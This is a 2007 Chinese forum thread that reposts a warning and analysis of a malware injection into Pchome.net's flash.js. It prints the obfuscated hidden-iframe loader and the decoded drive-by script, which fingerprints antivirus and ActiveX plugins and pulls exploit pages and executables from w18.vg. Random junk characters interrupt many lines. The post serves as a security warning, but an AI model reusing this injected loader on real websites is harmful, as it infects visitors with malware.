下沙论坛

标题: 小心!Pchome.net出现大面积挂马现象,敬请会员们注意安全! [打印本页]
作者: 竹木刀    时间: 2007-12-29 15:56
标题: 小心!Pchome.net出现大面积挂马现象,敬请会员们注意安全!
截至2007-12-28 18:17 仍修复' Q- b" T" N$ h# f' k4 _/ x6 [

: W/ R- S  z5 w/ `9 u, R' O9 @: h' i9 ]+ W
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I% y1 m( I3 l" [' z

, W/ o: t( s, m* K0 b% H从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView
, V$ Q; }5 }0 h; ]
5 ?# E; [* X# q: G  F挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:
5 w2 G; p2 U& b* |- \( p- t; c! p; K" m3 Q) X) W
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');: x; P9 ^& m- P
8 F8 i. K' D6 M& ~% H" R
也就是这个了:
- {" {+ A$ \. Z
; G' D0 ]8 k4 U  Y$ l2 D: ]6 j. [window["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');
9 y1 _+ C9 e/ s3 t& @' ]
7 e7 @8 O" Z! I5 p& q# q2 @+ X6 T但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:7 G1 {/ t# N; o/ A1 K
! }8 X* E1 P- k- Y& [, m1 y2 S4 M  b* i
<script language="javascript" type="text/javascript">& n% M7 h- G& N8 s9 I
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");2 F7 G3 a8 k1 d6 E! a; d5 s
</script>
" G( D9 b  C# m) B" ]" C1 i
/ Z. W& F- _* U* X# m) C/ E% T有了这个,iframe就生效了;经过一番调用和解密后得:5 G7 I" M7 F( g! [; y- `  u, Z
/ L3 k& F) S2 e$ K" H3 Q) q% g
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}
: o4 |* _9 N6 e! A
5 t- G6 A: F& ~* K* [, |# qK##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
: W7 x1 Y, K* |& s  h* M3 x: t4 P9 O" N& ^% D# l2 P1 j( S2 F; A
( L- Z- _/ T/ f! C0 I6 ]
挑了几个解密得:http://w18.vg/s.exe
0 s9 V  d" V. H8 \, Z/ T8 }$ b. S' Y' }
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe/ {( V* j0 n" f8 _; o
6 Z2 t( k. P" f. G7 n3 ]& o
有点面熟的东西……' n! `0 ?! {* b, O1 j  h" c" u

: q' l2 E6 r/ N& g4 J##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
' N$ U1 U, e" _+ l0 ^' A6 J) H2 q% N# H, D) t
从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。& C( ~9 t6 \2 [. y$ E* v$ A. }
2 F. I6 p0 S1 ?: f$ z5 S
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE3 t( ~+ X* n/ Z7 T% ^, D. C7 r2 {3 }

5 {8 J/ a! Y& ]! a7 j# D: z( ~' l4 Y$ e转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html6 O& p+ b- H1 t

$ f1 f, @# n) h- i; v- m$ F
& y5 k+ k  }9 {作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html
作者: 煎饼    时间: 2007-12-29 21:36
多谢。it类一般只去pconline和zol
作者: 竹木刀    时间: 2007-12-29 21:57
我是四处流窜的,IT信息看CB比较多。
作者: 煎饼    时间: 2007-12-30 01:41
对了。忘记说cnbeta最常去了



欢迎光临 下沙论坛 (http://bbs.xiasha.cn/) Powered by Discuz! X3.3